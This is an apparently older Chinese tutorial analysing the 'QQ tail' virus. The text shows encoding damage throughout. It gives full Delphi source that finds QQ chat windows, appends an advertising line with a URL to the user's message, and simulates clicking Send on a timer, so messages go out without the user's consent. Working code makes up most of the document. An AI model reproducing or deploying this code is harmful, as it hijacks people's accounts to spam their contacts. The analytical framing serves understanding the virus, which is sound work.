QQ尾巴病毒的發(fā)送原理分析
近來(lái)QQ尾巴病毒大肆發(fā)作,我也是經(jīng)常收到網(wǎng)友們發(fā)到來(lái)的帶尾巴的消息,于是,好奇心一來(lái),我也來(lái)研究研究此病毒的發(fā)作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜測(cè)并且自己寫(xiě)了一個(gè)類似的程序來(lái)實(shí)現(xiàn)它。
QQ尾巴的發(fā)作情況:當(dāng)用戶打開(kāi)一個(gè)QQ消息發(fā)送窗口時(shí),病毒會(huì)自動(dòng)往消息文本框里輸入文本,然后不等用戶反應(yīng)過(guò)來(lái)就發(fā)出去了。
程序?qū)崿F(xiàn):首先要找到QQ消息發(fā)送窗口的句柄以及消息文本框與“發(fā)送”按鈕的窗口句柄。
一、 如何找到QQ消息發(fā)送窗口句柄:
QQ消息發(fā)送窗口有兩種,一種是消息模式,在這種情況下,窗口標(biāo)題含有“發(fā)送消息”字樣;一種是聊天模式,窗口標(biāo)題含有“聊天中”字樣;
通過(guò)枚舉窗口就可找到相應(yīng)的句柄:
// 取得QQ的發(fā)送消息窗口
var
hCurrentWindow: HWnd;
WndText:String;
begin
hCurrentWindow := GetWindow(
application.Handle, GW_HWNDFIRST);
while hCurrentWindow <> 0 do
begin
WndText:=GetWndText(hCurrentWindow);
if (Pos('聊天中',WndText)>0) or (Pos('發(fā)送消息',WndText)>0) then
begin
Result:=hCurrentWindow;
Exit;
end;
hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
end;
Result:=0;
end;
二、 如何找到“發(fā)送”按鈕窗口句柄:
找到了QQ的發(fā)送消息窗口后,就可以進(jìn)一步查找“發(fā)送”按鈕句柄了,如窗口句柄為qqWnd,則可以用一個(gè)循環(huán),查找文本中含有“發(fā)送”字樣的窗口,經(jīng)過(guò)試驗(yàn)發(fā)現(xiàn),“發(fā)送”按鈕恰恰是窗體的第一個(gè)子窗口,這樣,可以用
btnWnd:=GetDlgItem(qqWnd,1); // 發(fā)送按鈕
來(lái)獲得“發(fā)送”按鈕的句柄。
三、 如何找到消息文本框窗口句柄:
消息文本框并不好找,不過(guò)你可以先在消息文本框中輸入幾個(gè)字母,如“abcd”,這樣我們就可以用上述方法來(lái)查找了,不過(guò)通過(guò)實(shí)驗(yàn)后,發(fā)現(xiàn)消息文本框并不是QQ窗口的直接子窗口,而是其中一個(gè)子窗口的子窗口,通過(guò)實(shí)驗(yàn),可以用
txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框
來(lái)獲得。
四、 如何獲得原消息文本框的文本:
要獲取原消息文本框的文本,只需要一個(gè)API函數(shù)就行了,如下:
// 獲得窗口文本
function GetWndText(hWnd: HWND): String;
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;
GetMem(mText,Ret);
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_GETTEXT,Ret,Buf);
Result:=StrPas(mText);
finally
FreeMem(mText,Ret);
end;
end;
五、 如何住原消息文本框里追加文本:
與取文本相反
// 發(fā)送文本到窗口
PRocedure SetWndText(hWnd: HWND; Text: String);
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
GetMem(mText,Length(Text));
StrCopy(mText,PChar(Text));
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_SETTEXT,0,Buf);
finally
FreeMem(mText,Length(Text));
end;
end;
六、 如果讓“發(fā)送”按鈕自動(dòng)點(diǎn)擊:
一切都準(zhǔn)備好了,現(xiàn)在要開(kāi)始發(fā)送了,為了讓消息自動(dòng)發(fā)送,我們可以模擬“發(fā)送”按鈕被點(diǎn)擊了。
SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);
SendMessage(btnWnd,WM_LBUTTONUP,0,0);
通過(guò)模擬一個(gè)鼠標(biāo)在“開(kāi)始”按鈕上的按下與放開(kāi),就實(shí)現(xiàn)了點(diǎn)擊發(fā)送功能。
七、 其它的定時(shí)功能比較簡(jiǎn)單,在此也不多說(shuō)了。
八、 全部源代碼如下:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls;
type
TForm1 = class(TForm)
Timer1: TTimer;
Button1: TButton;
Edit1: TEdit;
Label1: TLabel;
Button2: TButton;
procedure Timer1Timer(Sender: TObject);
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
// 獲得窗口文本
function GetWndText(hWnd: HWND): String;
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1;
GetMem(mText,Ret);
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_GETTEXT,Ret,Buf);
Result:=StrPas(mText);
finally
FreeMem(mText,Ret);
end;
end;
// 發(fā)送文本到窗口
procedure SetWndText(hWnd: HWND; Text: String);
Var
Ret:LongInt;
mText:PChar;
Buf:Integer;
begin
GetMem(mText,Length(Text));
StrCopy(mText,PChar(Text));
try
Buf:=LongInt(mText);
SendMessage(hWnd,WM_SETTEXT,0,Buf);
finally
FreeMem(mText,Length(Text));
end;
end;
// 取得QQ的發(fā)送消息窗口
function GetQQWnd: HWND;
var
hCurrentWindow: HWnd;
WndText:String;
begin
hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST);
while hCurrentWindow <> 0 do
begin
WndText:=GetWndText(hCurrentWindow);
if (Pos('聊天中',WndText)>0) or (Pos('發(fā)送消息',WndText)>0) then
begin
Result:=hCurrentWindow;
Exit;
end;
hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT);
end;
Result:=0;
end;
// 定時(shí)處理
procedure TimerProc;
var
qqWnd,txtWnd,btnWnd:HWND;
Msg:String;
begin
qqWnd:=GetQQWnd;
if qqWnd=0 then Exit;
btnWnd:=GetDlgItem(qqWnd,1); // 發(fā)送按鈕
txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框
if (btnWnd=0) or (txtWnd=0) then Exit;
Msg:=GetWndText(txtWnd);
Msg:=Msg+#13+#10+'歡迎光臨綠蔭網(wǎng)絡(luò)http://www.lvyin.net';
SetWndText(txtWnd,Msg);
SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0);
SendMessage(btnWnd,WM_LBUTTONUP,0,0);
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
TimerProc;
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
Timer1.Enabled :=not Timer1.Enabled;
if Timer1.Enabled then
Button1.Caption :='停 止'
else
Button1.Caption :='開(kāi) 始';
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
Timer1.Interval :=StrToInt(Edit1.Text);
end;
end.
